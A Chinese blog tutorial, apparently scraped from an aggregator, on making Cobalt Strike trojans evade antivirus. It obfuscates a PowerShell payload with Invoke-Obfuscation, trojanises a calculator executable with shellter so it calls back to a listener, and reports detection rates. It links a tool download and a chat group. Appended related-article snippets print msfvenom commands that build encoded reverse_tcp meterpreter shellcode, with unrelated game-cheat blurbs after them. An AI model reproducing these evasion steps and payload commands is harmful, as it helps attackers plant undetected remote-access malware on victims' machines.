cobalt strike木马免杀

article/2025/9/24 2:08:46

0x001-针对powershell免杀

工具:Invoke-Obfuscation

操作实例:

1、利用CS生成powershell木马

在这里插入图片描述

2、进入invoke-Obsfuscation文件,使用powershell命令执行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、利用powershell命令执行免杀后的ps1文件,成功上线
在这里插入图片描述

0x002 -针对可执行程序(.exe)的免杀

工具:shellter

1、进入shellter执行命令
在这里插入图片描述
PE文件就是可执行程序或者dll文件

在这里插入图片描述
启用隐身模式免杀率好像会降低,但是好处就是可以正常执行你填写的PE文件,例如我这里所用的PE文件是计算器,我开启隐身模式后执行生成的免杀木马也可以使用计算器功能。

在这里插入图片描述
在这里插入图片描述

我是利用Cobalt strike来建立监听的,当然也可以使用MSF来建立监听,只要你创建的监听和shellter里设置的监听一致就可以了。

2、测试生成的木马免杀率

在这里插入图片描述

效果还是挺不错的,生成的木马会替换你填写的PE文件,而且还会在shellter\Shellter_Backups目录备份PE文件

0x003-下载地址

链接:https://pan.baidu.com/s/1z5QcBrYIyMjAZ6z5nTM7lg

提取码:wgpe

欢迎大伙加入渗透学习交流群:1084999372(本群不搞HC)


http://chatgpt.dhexx.cn/article/c3I0Iso0.shtml

相关文章

一句话木马以及免杀

此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会…

Python木马分离免杀(下载分离型)

渗透环境: 目标主机:win10-192.168.159.133-杀软360、火绒、微步云沙盒 攻击主机:kali-192.168.159.129 使用工具:msfconsole、pyinstaller、pycharm 木马制作过程: 1、msfconsole的msfvenom模块生成shellcode k…

关于木马免杀的一些方法

一、免杀简述 ​ 理论上讲,免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道,第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的,也就是说免杀技术⾄少是在 1989年以后才发展起来的。 ​ 1989年:第⼀款杀毒软件M…

MSF木马的免杀(三)

目录 MSF木马的免杀 C/C加载免杀 加图标 MSF木马的免杀 MSF下输入下列命令,生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOSTx.x.x.x LPORT8888 -e x86/shikata_ga_nai -i 15 -b \x00\ PrependMigratetrue Pre…

木马免杀平台

VirScan 《多引擎在线扫描平台》 访问:https://www.virscan.org/ VirusTotal 《威胁猎捕平台》 访问:https://www.virustotal.com/gui/home/upload Jotti 《恶意软件扫描系统》 访问:https://virusscan.jotti.org/ 腾讯哈勃分析系统 《文件…

绕过杀毒软件,免杀木马制作

绕过杀毒软件,免杀木马制作(以AVG Anti Spyware杀毒软件为例) 一、将Sever.exe打开,分块生成100个文件 二、使用AVG Anti Spyware查杀生成的文件,再二次处理,重复这个过程,直到缩小到很小的范围…

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOSTXXX LPORTXXX -e x86/shikata_ga_nai -i 12 -b \x00\ PrependMigratetrue PrependMIgrateProxsvchost.exe -f c > /root/Desktop/shellcode.c 这里我们生成…

后渗透-木马免杀

木马免杀 0x00 免杀 木马免杀的方法有很多种,如反转、异或、远程加载、加壳等,这里举例反转加异或 0x01 利用msfvenom制作木马 sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.12.135 LPORT5555 -f py > 2.py# -p 指定payload # LHO…

APT之木马静态免杀

前言 这篇文章主要是记录手动编写代码进行木马免杀,使用工具也可以免杀,只不过太脚本小子了,而且工具的特征也容易被杀软抓到,指不定哪天就用不了了,所以要学一下手动去免杀木马,也方便以后开发一个只属于…

【木马免杀】

文章目录 前言题目一.免杀需求,查杀技术,免杀技巧,免杀实战免杀需求查杀技术免杀技巧免杀实战webshell免杀:1.引用免杀2.可变变量3.二维数组4.数组交集5.回调函数6.编码 木马免杀:1.msf自带免杀2.msf捆绑免杀3.msf自带…

2021Kali -- 木马免杀制作

​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF,演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b \x00 l…

msf生成免杀木马

一.杀软原理 免杀概念免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“…

052 木马免杀全攻略

木马免杀全攻略 转载自:a1pass.blog.163.com 2007-12-07 14:02:24| 分类: 思绪燃星火——技 | 标签:黑客 杂志刊物 作者:A1Pass 出处:http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》,与原…

渗透测试-木马免杀的几种方式

前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏…

木马免杀方式

前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏…

Kali渗透-MSF木马免杀技术

前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码&#…

C语言C++制作游戏外挂,一个简单的内存外挂!

通过 C 语言编写一个简单的外挂,通过 API 函数修改游戏数据,从而实现作弊功能 对象分析 要用的 API 函数简单介绍 编写测试效果 总体评价 下面是小编整理好的一套C/C资料,加小编C/C编程学习群825414254获取系统性学习C/C的学习资料 对象分析…

使用MisakaPatcher制作Galgame外挂汉化补丁

简介 这两天我看见一个galgame机翻工具 MisakaTranslator,它类似VNR,使用C#编写并且支持Hook和OCR(图像识别)两种方法提取文本。 我在MisakaTranslator的基础上进行了一些改动,去除了所有的机翻的功能,转…

利用python编程,制作自己的游戏“外挂”!

Python简介及应用领域 Python是一种解释型脚本语言,可以应用于以下领域: Web 和 Internet开发科学计算和统计人工智能教育桌面界面开发软件开发后端开发网络爬虫 今天以一个小游戏和一小段代码来告诉大家编程有多好玩。 编程用的好,不仅可…

外挂的艺术-单机游戏辅助工具-网络游戏外挂

外挂(wi gu) 又叫开挂、开外挂、辅助、第三方辅助软件,综合某些修改器的功能进行编程出的游戏修改器。一般指通过修改游戏数据而为玩家谋取利益的作弊程序或软件,即利用电脑技术针对一个或多个软件进行非原设操作,篡改…